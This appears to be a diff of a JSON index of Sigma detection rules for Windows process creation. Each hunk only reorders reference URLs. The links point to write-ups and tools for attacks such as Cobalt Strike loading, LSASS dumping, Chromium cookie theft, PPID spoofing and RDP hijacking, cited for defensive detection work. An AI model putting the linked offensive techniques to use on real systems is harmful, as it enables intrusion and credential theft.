+ "https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b",
 "https://www.joesandbox.com/analysis/443736/0/html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_revil_kaseya.yml"
 ],
@@ -56520,9 +56544,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.cobaltstrike.com/help-windows-executable",
- "https://redcanary.com/threat-detection-report/",
 "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/",
+ "https://redcanary.com/threat-detection-report/",
+ "https://www.cobaltstrike.com/help-windows-executable",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_load_by_rundll32.yml"
 ],
 "tags": [
@@ -56635,9 +56659,9 @@
 "logsource.product": "windows",
 "refs": [
 "https://www.picussecurity.com/resource/blog/how-to-detect-parent-pid-ppid-spoofing-attacks",
- "https://pentestlab.blog/2020/02/24/parent-pid-spoofing/",
- "https://www.ired.team/offensive-security/defense-evasion/parent-process-id-ppid-spoofing",
 "https://www.virustotal.com/gui/search/filename%253A*spoof*%2520filename%253A*ppid*/files",
+ "https://www.ired.team/offensive-security/defense-evasion/parent-process-id-ppid-spoofing",
+ "https://pentestlab.blog/2020/02/24/parent-pid-spoofing/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_selectmyparent.yml"
 ],
 "tags": [
@@ -56670,10 +56694,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3",
- "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/",
- "https://twitter.com/splinter_code/status/1483815103279603714",
 "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/",
+ "https://twitter.com/splinter_code/status/1483815103279603714",
+ "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/",
+ "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_advancedrun_priv_user.yml"
 ],
 "tags": "No established tags"
@@ -56694,9 +56718,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd",
 "https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/",
 "https://docs.microsoft.com/en-us/azure/dns/dns-zones-records",
- "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dnscmd_discovery.yml"
 ],
 "tags": [
@@ -56754,8 +56778,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Cmdl32/",
 "https://twitter.com/SwiftOnSecurity/status/1455897435063074824",
+ "https://lolbas-project.github.io/lolbas/Binaries/Cmdl32/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cmdl32.yml"
 ],
 "tags": [
@@ -56798,8 +56822,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://unit42.paloaltonetworks.com/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-20---powershell-invoke-known-malicious-cmdlets",
 "https://mikefrobbins.com/2017/06/15/simple-obfuscation-with-powershell-using-base64-encoding/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-20---powershell-invoke-known-malicious-cmdlets",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_encode.yml"
 ],
 "tags": [
@@ -56865,8 +56889,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/",
 "https://lolbas-project.github.io/lolbas/Binaries/Atbroker/",
+ "http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_atbroker.yml"
 ],
 "tags": [
@@ -56935,8 +56959,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://lolbas-project.github.io/lolbas/Binaries/Rasautou/",
- "https://github.com/fireeye/DueDLLigence",
 "https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html",
+ "https://github.com/fireeye/DueDLLigence",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_rasautou_dll_execution.yml"
 ],
 "tags": [
@@ -57003,8 +57027,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-4---system-discovery-using-sharpview",
 "https://github.com/tevora-threat/SharpView/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-4---system-discovery-using-sharpview",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml"
 ],
 "tags": [
@@ -57055,8 +57079,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/",
 "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/",
+ "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_iss_module_install.yml"
 ],
 "tags": [
@@ -57081,8 +57105,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://learn.microsoft.com/en-us/windows/win32/secauthz/mandatory-integrity-control",
- "https://cybercryptosec.medium.com/covid-19-cyber-infection-c615ead7c29",
 "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/",
+ "https://cybercryptosec.medium.com/covid-19-cyber-infection-c615ead7c29",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_conhost_option.yml"
 ],
 "tags": [
@@ -57182,8 +57206,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.007/T1546.007.md",
 "https://attack.mitre.org/software/S0108/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.007/T1546.007.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_netsh_dll_persistence.yml"
 ],
 "tags": [
@@ -57217,8 +57241,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.echotrail.io/insights/search/msbuild.exe",
 "https://app.any.run/tasks/abdf586e-df0c-4d39-89a7-06bf24913401/",
+ "https://www.echotrail.io/insights/search/msbuild.exe",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_msbuild.yml"
 ],
 "tags": [
@@ -57341,8 +57365,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/windows/win32/intl/code-page-identifiers",
 "https://twitter.com/cglyer/status/1183756892952248325",
+ "https://docs.microsoft.com/en-us/windows/win32/intl/code-page-identifiers",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_codepage_switch.yml"
 ],
 "tags": [
@@ -57367,9 +57391,9 @@
 "logsource.product": "windows",
 "refs": [
 "https://github.com/defaultnamehere/cookie_crimes/",
- "https://embracethered.com/blog/posts/2020/chrome-spy-remote-control/",
 "https://mango.pdf.zone/stealing-chrome-cookies-without-a-password",
 "https://embracethered.com/blog/posts/2020/cookie-crimes-on-mirosoft-edge/",
+ "https://embracethered.com/blog/posts/2020/chrome-spy-remote-control/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_chromium_headless_debugging.yml"
 ],
 "tags": [
@@ -57600,8 +57624,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec",
 "https://www.youtube.com/watch?v=ro2QuZTIMBM",
+ "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexesvc_renamed.yml"
 ],
 "tags": [
@@ -57624,8 +57648,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.joesandbox.com/analysis/476188/1/iochtml",
 "https://twitter.com/neonprimetime/status/1435584010202255375",
+ "https://www.joesandbox.com/analysis/476188/1/iochtml",
 "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_control_cve_2021_40444.yml"
 ],
@@ -57694,8 +57718,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf",
 "https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution",
+ "https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_gamaredon_ultravnc.yml"
 ],
 "tags": [
@@ -57720,9 +57744,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://twitter.com/sblmsrsn/status/1445758411803480072?s=20",
 "https://lolbas-project.github.io/lolbas/Binaries/Certoc/",
 "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2",
- "https://twitter.com/sblmsrsn/status/1445758411803480072?s=20",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certoc_execution.yml"
 ],
 "tags": [
@@ -57917,8 +57941,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Regedit/",
 "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f",
+ "https://lolbas-project.github.io/lolbas/Binaries/Regedit/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_export_keys.yml"
 ],
 "tags": [
@@ -58085,8 +58109,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy",
 "https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade",
+ "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_new_network_provider.yml"
 ],
 "tags": [
@@ -58119,8 +58143,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://hausec.com/2021/07/26/cobalt-strike-and-tradecraft/",
 "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/",
+ "https://hausec.com/2021/07/26/cobalt-strike-and-tradecraft/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_process_patterns.yml"
 ],
 "tags": [
@@ -58213,8 +58237,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/",
 "https://the.earth.li/~sgtatham/putty/0.58/htmldoc/Chapter7.html",
+ "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_plink.yml"
 ],
 "tags": [
@@ -58298,8 +58322,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://github.com/mbevilacqua/appcompatprocessor/blob/6c847937c5a836e2ce2fe2b915f213c345a3c389/AppCompatSearch.txt",
- "https://github.com/ThreatHuntingProject/ThreatHunting/blob/cb22598bb70651f88e0285abc8d835757d2cb596/hunts/suspicious_process_creation_via_windows_event_logs.md",
 "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/",
+ "https://github.com/ThreatHuntingProject/ThreatHunting/blob/cb22598bb70651f88e0285abc8d835757d2cb596/hunts/suspicious_process_creation_via_windows_event_logs.md",
 "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_execution_path.yml"
 ],
@@ -58349,8 +58373,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://isc.sans.edu/diary/Wipe+the+drive+Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394",
 "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html",
+ "https://isc.sans.edu/diary/Wipe+the+drive+Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394",
 "http://0xthem.blogspot.com/2014/03/t-emporal-persistence-with-and-schtasks.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_monitoring_for_persistence_via_bits.yml"
 ],
@@ -58465,8 +58489,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/kmkz_security/status/1220694202301976576",
 "https://github.com/kmkz/Pentesting/blob/47592e5e160d3b86c2024f09ef04ceb87d204995/Post-Exploitation-Cheat-Sheet",
+ "https://twitter.com/kmkz_security/status/1220694202301976576",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rdp_hijack_shadowing.yml"
 ],
 "tags": [
@@ -58536,8 +58560,8 @@
 "logsource.product": "windows",
 "refs": [
 "http://www.xuetr.com/",
- "https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/",
 "https://www.hexacorn.com/blog/2018/04/20/kernel-hacking-tool-you-might-have-never-heard-of-xuetr-pchunter/",
+ "https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pchunter.yml"
 ],
 "tags": "No established tags"
@@ -58559,11 +58583,11 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://cybleinc.com/2021/02/15/ngrok-platform-abused-by-hackers-to-deliver-a-new-wave-of-phishing-attacks/",
 "https://www.virustotal.com/gui/file/58d21840d915aaf4040ceb89522396124c82f325282f805d1085527e1e2ccfa1/detection",
+ "https://cybleinc.com/2021/02/15/ngrok-platform-abused-by-hackers-to-deliver-a-new-wave-of-phishing-attacks/",
 "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html",
- "https://stackoverflow.com/questions/42442320/ssh-tunnel-to-ngrok-and-initiate-rdp",
 "https://www.softwaretestinghelp.com/how-to-use-ngrok/",
+ "https://stackoverflow.com/questions/42442320/ssh-tunnel-to-ngrok-and-initiate-rdp",
 "https://ngrok.com/docs",
 "https://twitter.com/xorJosh/status/1598646907802451969",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ngrok_pua.yml"
@@ -58645,9 +58669,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://lolbas-project.github.io/lolbas/OtherMSBinaries/FsiAnyCpu/",
 "https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/",
 "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules",
+ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/FsiAnyCpu/",
 "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Fsi/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml"
 ],
@@ -58681,8 +58705,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml",
 "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/",
+ "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_applications_spawning_wmi_commandline.yml"
 ],
 "tags": [
@@ -58884,8 +58908,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340",
 "https://twitter.com/bohops/status/1477717351017680899?s=12",
+ "https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340",
 "https://lolbas-project.github.io/lolbas/OtherMSBinaries/AccCheckConsole/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml"
 ],
@@ -58909,9 +58933,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)",
 "https://twitter.com/0gtweet/status/1564968845726580736",
 "https://strontic.github.io/xcyclopedia/library/ldifde.exe-979DE101F5059CEC1D2C56967CA2BAC0.html",
+ "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ldifde_file_load.yml"
 ],
 "tags": [
@@ -59004,9 +59028,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.youtube.com/watch?v=JGs-aKf2OtU&ab_channel=OFFZONEMOSCOW",
 "https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat",
 "https://github.com/gladiatx0r/Powerless/blob/04f553bbc0c65baf4e57344deff84e3f016e6b51/Powerless.bat",
+ "https://www.youtube.com/watch?v=JGs-aKf2OtU&ab_channel=OFFZONEMOSCOW",
 "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment?slide=43",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_accesschk_usage_after_priv_escalation.yml"
 ],
@@ -59108,9 +59132,9 @@
 "logsource.product": "windows",
 "refs": [
 "https://www.acronis.com/en-us/blog/posts/lockbit-ransomware/",
- "https://blog.sygnia.co/kaseya-ransomware-supply-chain-attack",
 "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware",
 "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf",
+ "https://blog.sygnia.co/kaseya-ransomware-supply-chain-attack",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ping_del.yml"
 ],
 "tags": [
@@ -59328,8 +59352,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1388",
 "https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege",
+ "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1388",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2019_1388.yml"
 ],
 "tags": [
@@ -59521,8 +59545,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/GhostPack/Rubeus",
 "https://www.harmj0y.net/blog/redteaming/from-kekeo-to-rubeus/",
+ "https://github.com/GhostPack/Rubeus",
 "https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_rubeus.yml"
 ],
@@ -59635,10 +59659,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://eqllib.readthedocs.io/en/latest/analytics/e61f557c-a9d0-4c25-ab5b-bbc46bb24deb.html",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-2---system-service-discovery---netexe",
 "https://eqllib.readthedocs.io/en/latest/analytics/4d2e7fc1-af0b-4915-89aa-03d25ba7805e.html",
 "https://eqllib.readthedocs.io/en/latest/analytics/9b3dd402-891c-4c4d-a662-28947168ce61.html",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-2---system-service-discovery---netexe",
+ "https://eqllib.readthedocs.io/en/latest/analytics/e61f557c-a9d0-4c25-ab5b-bbc46bb24deb.html",
 "https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_net_execution.yml"
 ],
@@ -59880,8 +59904,8 @@
 "refs": [
 "https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf",
 "https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf",
- "https://lolbas-project.github.io/lolbas/Libraries/Setupapi/",
 "https://twitter.com/Z3Jpa29z/status/1313742350292746241?s=20",
+ "https://lolbas-project.github.io/lolbas/Libraries/Setupapi/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_setupapi_installhinfsection.yml"
 ],
 "tags": [
@@ -59971,8 +59995,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html",
 "https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6",
+ "http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_tscon_rdp_redirect.yml"
 ],
 "tags": [
@@ -60074,8 +60098,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar",
 "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/",
+ "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_base64_load.yml"
 ],
 "tags": [
@@ -60110,8 +60134,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf",
 "https://github.com/deepinstinct/Lsass-Shtinkering",
+ "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lsass_shtinkering.yml"
 ],
 "tags": [
@@ -60186,8 +60210,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://emkc.org/s/RJjuLa",
 "https://redcanary.com/blog/chromeloader/",
+ "https://emkc.org/s/RJjuLa",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_chrome_load_extension.yml"
 ],
 "tags": [
@@ -60287,8 +60311,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/",
 "https://subt0x10.blogspot.de/2017/04/bypass-application-whitelisting-script.html",
+ "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml"
 ],
 "tags": [
@@ -60324,8 +60348,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://twitter.com/MichalKoczwara/status/1553634816016498688",
- "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-8---windows---disable-the-sr-scheduled-task",
+ "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_disable.yml"
 ],
 "tags": [
@@ -60425,8 +60449,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/_st0pp3r_/status/1560072680887525378",
 "https://twitter.com/Oddvarmoe/status/993383596244258816",
+ "https://twitter.com/_st0pp3r_/status/1560072680887525378",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pester_parent.yml"
 ],
 "tags": [
@@ -60468,8 +60492,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md",
 "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_screensaver_reg.yml"
 ],
 "tags": [
@@ -60561,8 +60585,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://twitter.com/gN3mes1s/status/1222088214581825540",
- "https://twitter.com/gN3mes1s/status/1222095963789111296",
 "https://twitter.com/gN3mes1s/status/1222095371175911424",
+ "https://twitter.com/gN3mes1s/status/1222095963789111296",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dctask64_proc_inject.yml"
 ],
 "tags": [
@@ -60694,10 +60718,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad",
- "https://lolbas-project.github.io/lolbas/OtherMSBinaries/VisualUiaVerifyNative/",
 "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules",
+ "https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad",
 "https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/",
+ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/VisualUiaVerifyNative/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml"
 ],
 "tags": [
